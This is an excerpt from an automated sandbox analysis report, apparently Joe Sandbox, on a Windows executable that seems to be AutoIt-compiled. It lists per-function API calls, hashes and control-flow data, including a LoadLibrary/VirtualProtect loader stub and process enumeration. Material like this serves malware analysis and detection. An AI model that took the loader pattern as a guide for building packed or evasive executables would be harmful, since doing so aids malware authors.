                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: b9e2de07cc4069ee0ec554165ed937d8c97b7e9ea87ad479e9a775e3cf53bbe3
                          • Instruction ID: 10fbafc2b8c6c5b6152a12aa77c7f260ff14e3bbef93b4e42dc5f817bf2839a5
                          • Opcode Fuzzy Hash: b9e2de07cc4069ee0ec554165ed937d8c97b7e9ea87ad479e9a775e3cf53bbe3
                          • Instruction Fuzzy Hash: EBE16D71604201AFC715DF25C891D2ABBE9EF89720F0485ADF44ADB3A1DB35EE01CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B029C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1278 b029c2-b029e2 1280 b02a42-b02a44 1278->1280 1281 b029e4-b029e7 1278->1281 1280->1281 1282 b02a46 1280->1282 1283 b02a48 1281->1283 1284 b029e9-b029f0 1281->1284 1285 b02a2b-b02a33 NtdllDefWindowProc_W 1282->1285 1286 b72307-b72335 call b0322e call b1ec33 1283->1286 1287 b02a4e-b02a51 1283->1287 1288 b029f6-b029fb 1284->1288 1289 b02aac-b02ab4 PostQuitMessage 1284->1289 1290 b02a39-b02a3f 1285->1290 1321 b7233a-b72341 1286->1321 1291 b02a53-b02a54 1287->1291 1292 b02a76-b02a9d SetTimer RegisterClipboardFormatW 1287->1292 1294 b02a01-b02a03 1288->1294 1295 b7238f-b723a3 call b457fb 1288->1295 1296 b02a72-b02a74 1289->1296 1297 b02a5a-b02a6d KillTimer call b02b94 call b02ac7 1291->1297 1298 b722aa-b722ad 1291->1298 1292->1296 1300 b02a9f-b02aaa CreatePopupMenu 1292->1300 1301 b02ab6-b02ac0 call b01e58 1294->1301 1302 b02a09-b02a0e 1294->1302 1295->1296 1312 b723a9 1295->1312 1296->1290 1297->1296 1305 b722e3-b72302 MoveWindow 1298->1305 1306 b722af-b722b1 1298->1306 1300->1296 1313 b02ac5 1301->1313 1309 b72374-b7237b 1302->1309 1310 b02a14-b02a19 1302->1310 1305->1296 1314 b722b3-b722b6 1306->1314 1315 b722d2-b722de SetFocus 1306->1315 1309->1285 1317 b72381-b7238a call b3b31f 1309->1317 1319 b7235f-b7236f call b45fdb 1310->1319 1320 b02a1f-b02a25 1310->1320 1312->1285 1313->1296 1314->1320 1322 b722bc-b722cd call b0322e 1314->1322 1315->1296 1317->1285 1319->1296 1320->1285 1320->1321 1321->1285 1326 b72347-b7235a call b02b94 call b03598 1321->1326 1322->1296 1326->1285
                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00B02A33
                          • KillTimer.USER32(?,00000001), ref: 00B02A5D
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B02A80
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B02A8B
                          • CreatePopupMenu.USER32 ref: 00B02A9F
                          • PostQuitMessage.USER32(00000000), ref: 00B02AAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                          • String ID: TaskbarCreated
                          • API String ID: 157504867-2362178303
                          • Opcode ID: 02e96954ecbf5a58791dcd1b136961b5e59e3eb44744e38f6b223c0270b0c128
                          • Instruction ID: 792407b42e40bb088485a7c62e197e20e81398dac22d6aa093e5ef268409293f
                          • Opcode Fuzzy Hash: 02e96954ecbf5a58791dcd1b136961b5e59e3eb44744e38f6b223c0270b0c128
                          • Instruction Fuzzy Hash: 3841F231304249ABDB24AB6C9C4DF793FD9EB15340F0045AAF906E31E2DE6088489765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                          Download Yara Rule
                          APIs
                          • GetVersionExW.KERNEL32(?,00000000), ref: 00B1E4A7
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • GetCurrentProcess.KERNEL32(00000000,00B9DC28,?,?), ref: 00B1E567
                          • GetNativeSystemInfo.KERNEL32(?,00B9DC28,?,?), ref: 00B1E5BC
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B1E5C7
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B1E5DA
                          • GetSystemInfo.KERNEL32(?,00B9DC28,?,?), ref: 00B1E5E4
                          • GetSystemInfo.KERNEL32(?,00B9DC28,?,?), ref: 00B1E5F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                          • String ID:
                          • API String ID: 2717633055-0
                          • Opcode ID: cba6acc9845d198c5efe7038ddbcbd3bb88a1d5e3047101014ca4ec8374266fc
                          • Instruction ID: 32536aa1b3796dac877c0ec7d6a285a359e1c7b5fe5077fabe66c0c0ae40deb0
                          • Opcode Fuzzy Hash: cba6acc9845d198c5efe7038ddbcbd3bb88a1d5e3047101014ca4ec8374266fc
                          • Instruction Fuzzy Hash: FE61BFB1809284CBCF15CF6898C11E97FF5AF3A304F5985E9DC589B24BE634C988CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B46F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B46F7D
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00B46F8D
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00B46FAC
                          • __wsplitpath.LIBCMT ref: 00B46FD0
                          • _wcscat.LIBCMT ref: 00B46FE3
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B47022
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                          • String ID:
                          • API String ID: 1605983538-0
                          • Opcode ID: 1075d7c409ad9a7dd8a9e0ae864e2ef0c7d3f426e450a06c50780f60d87ea81a
                          • Instruction ID: 00938e3f05e6285c6a7492937562d37f5bbaba709d16b410d8448087d0a42781
                          • Opcode Fuzzy Hash: 1075d7c409ad9a7dd8a9e0ae864e2ef0c7d3f426e450a06c50780f60d87ea81a
                          • Instruction Fuzzy Hash: 22214F71905218ABDB11ABA4DC88BEAB7FCEB49300F1004EAE545E3251EB759F84DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B031F2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00B03219
                          • LoadResource.KERNEL32(?,00000000), ref: 00B757D7
                          • SizeofResource.KERNEL32(?,00000000), ref: 00B757EC
                          • LockResource.KERNEL32(?), ref: 00B757FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID: SCRIPT
                          • API String ID: 3473537107-3967369404
                          • Opcode ID: cbaf0cf4307effbdf937f87f80d3a5241e1f91073b11fb2e46c3b6c0b03037a5
                          • Instruction ID: ed54b2a1b464d55a529d0e944fa0998f1643b0b1dbc03e9f017058e9aabe4cca
                          • Opcode Fuzzy Hash: cbaf0cf4307effbdf937f87f80d3a5241e1f91073b11fb2e46c3b6c0b03037a5
                          • Instruction Fuzzy Hash: 8D112775200701BFEB259B65EC88F277BFDEBC9B51F2081A9B412972A0DB71DD00CA60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00C830E0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 00C8321A
                          • GetProcAddress.KERNEL32(?,00C7CFF9), ref: 00C83238
                          • ExitProcess.KERNEL32(?,00C7CFF9), ref: 00C83249
                          • VirtualProtect.KERNEL32(00B00000,00001000,00000004,?,00000000), ref: 00C83297
                          • VirtualProtect.KERNEL32(00B00000,00001000), ref: 00C832AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                          • String ID:
                          • API String ID: 1996367037-0
                          • Opcode ID: 310c225991a9bd2393153d6d2aacccfb14f21de40d599e04891a2682004e8f83
                          • Instruction ID: 3a8aa8d37153b56b1bdb0f04b686405071e2f2f102bb1079b9336778b5f6c4a8
                          • Opcode Fuzzy Hash: 310c225991a9bd2393153d6d2aacccfb14f21de40d599e04891a2682004e8f83
                          • Instruction Fuzzy Hash: 91512E71A443D25BDB20AEB8CCC8665B7A0EB52F287181738C9F2C73C6E7945B068758
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(00B0C848,00B0C848), ref: 00B1DDA2
                          • FindFirstFileW.KERNEL32(00B0C848,?), ref: 00B74A83
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$AttributesFindFirst
                          • String ID:
                          • API String ID: 4185537391-0
                          • Opcode ID: 4eed80beb9585143c6bc1385d4ec2078e94c98ae0e96d1e51b29d0e22176f9db
                          • Instruction ID: bfcd49c5a09582cc81570291f38291964a5c0a3ea69a1ed251c7b029eceea1c1
                          • Opcode Fuzzy Hash: 4eed80beb9585143c6bc1385d4ec2078e94c98ae0e96d1e51b29d0e22176f9db
                          • Instruction Fuzzy Hash: 01E0D8314144015742147738EC4D8E937DC9E06339B500756F835D20F0EB709D40C6D6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86c50ab21d93d70ed6deb0ef2fd7ccd4a4be6aafbe278b3c80ee0928ea136d45
                          • Instruction ID: 11f79763eb421ba46ca165e66f89c8702f872fb07a047c25fd2eedd9d9b7dd3d
                          • Opcode Fuzzy Hash: 86c50ab21d93d70ed6deb0ef2fd7ccd4a4be6aafbe278b3c80ee0928ea136d45
                          • Instruction Fuzzy Hash: DB229070900216DFDB24DF98C494AAABBF0FF18300F14C5A9E85AAB3D1D775E985CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B13680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: 6c56e2b482ac7670e655bca8c12f72520a097f942457232afa9c4a884e738a47
                          • Instruction ID: 3bbd50807f52a56183dfb8bc2028fefcfc872932b091870ff2a5ede51802e1da
                          • Opcode Fuzzy Hash: 6c56e2b482ac7670e655bca8c12f72520a097f942457232afa9c4a884e738a47
                          • Instruction Fuzzy Hash: 89926B70608341DFD724DF18C484BAABBE1FF88704F54889DE99A8B292D771ED85CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E279
                          • timeGetTime.WINMM ref: 00B0E51A
                          • TranslateMessage.USER32(?), ref: 00B0E646
                          • DispatchMessageW.USER32(?), ref: 00B0E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E664
                          • LockWindowUpdate.USER32(00000000), ref: 00B0E697
                          • DestroyWindow.USER32 ref: 00B0E6A3
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B0E6BD
                          • Sleep.KERNEL32(0000000A), ref: 00B75B15
                          • TranslateMessage.USER32(?), ref: 00B762AF
                          • DispatchMessageW.USER32(?), ref: 00B762BD
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B762D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                          • API String ID: 2641332412-570651680
                          • Opcode ID: 6eea0435f1f4feddf6ae0e7d7a28290500e4be65576b4da2813f0ae85e217fa1
                          • Instruction ID: b93e8d2138dd9881ee16c1de3dd01e693a791f468cab7956e0734a27cda61960
                          • Opcode Fuzzy Hash: 6eea0435f1f4feddf6ae0e7d7a28290500e4be65576b4da2813f0ae85e217fa1
                          • Instruction Fuzzy Hash: E962C1705083409FDB24DF24C895BAA7BE4FF44304F0449ADF96A9B2E2DBB5D848CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B36A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___createFile.LIBCMT ref: 00B36C73
                          • ___createFile.LIBCMT ref: 00B36CB4
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B36CDD
                          • __dosmaperr.LIBCMT ref: 00B36CE4
                          • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B36CF7
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B36D1A
                          • __dosmaperr.LIBCMT ref: 00B36D23
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B36D2C
                          • __set_osfhnd.LIBCMT ref: 00B36D5C
                          • __lseeki64_nolock.LIBCMT ref: 00B36DC6
                          • __close_nolock.LIBCMT ref: 00B36DEC
                          • __chsize_nolock.LIBCMT ref: 00B36E1C
                          • __lseeki64_nolock.LIBCMT ref: 00B36E2E
                          • __lseeki64_nolock.LIBCMT ref: 00B36F26
                          • __lseeki64_nolock.LIBCMT ref: 00B36F3B
                          • __close_nolock.LIBCMT ref: 00B36F9B
                            • Part of subcall function 00B2F84C: FindCloseChangeNotification.KERNEL32(00000000,00BAEEC4,00000000,?,00B36DF1,00BAEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B2F89C
                            • Part of subcall function 00B2F84C: GetLastError.KERNEL32(?,00B36DF1,00BAEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B2F8A6
                            • Part of subcall function 00B2F84C: __free_osfhnd.LIBCMT ref: 00B2F8B3
                            • Part of subcall function 00B2F84C: __dosmaperr.LIBCMT ref: 00B2F8D5
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • __lseeki64_nolock.LIBCMT ref: 00B36FBD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B370F2
                          • ___createFile.LIBCMT ref: 00B37111
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B3711E
                          • __dosmaperr.LIBCMT ref: 00B37125
                          • __free_osfhnd.LIBCMT ref: 00B37145
                          • __invoke_watson.LIBCMT ref: 00B37173
                          • __wsopen_helper.LIBCMT ref: 00B3718D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$Close___create$Handle__close_nolock__free_osfhnd$ChangeFindNotificationType__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                          • String ID: @
                          • API String ID: 3388700018-2766056989
                          • Opcode ID: b3f223242d890567f1c4bc4ae60075713e542351092ff71b702ef2f28e847540
                          • Instruction ID: 8d5f176e2c36df67b6c3f4e5f617dd32fba2e886df95ef6a075bb656de827f25
                          • Opcode Fuzzy Hash: b3f223242d890567f1c4bc4ae60075713e542351092ff71b702ef2f28e847540
                          • Instruction Fuzzy Hash: 3F221671904215ABEF299F68DC92BAD7BE1EF04320F3482E9E511EB2D1DB358D50CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B476DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00B476ED
                          • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00B47713
                          • _wcscpy.LIBCMT ref: 00B47741
                          • _wcscmp.LIBCMT ref: 00B4774C
                          • _wcscat.LIBCMT ref: 00B47762
                          • _wcsstr.LIBCMT ref: 00B4776D
                          • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B47789
                          • _wcscat.LIBCMT ref: 00B477D2
                          • _wcscat.LIBCMT ref: 00B477D9
                          • _wcsncpy.LIBCMT ref: 00B47804
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 716990576-1459072770
                          • Opcode ID: 9fb706d879e0562833775081dec6c14e19ef285769e70cd624f6e4279c6f3159
                          • Instruction ID: 74a69f766544d24659ce1d1006d0332170735a308a50d08871df7a33819e93c2
                          • Opcode Fuzzy Hash: 9fb706d879e0562833775081dec6c14e19ef285769e70cd624f6e4279c6f3159
                          • Instruction Fuzzy Hash: 0841F471A44214BADB01B765AC87EBF7BFCEF15710F1000E6F908A71A2EF649A41D7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B01F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
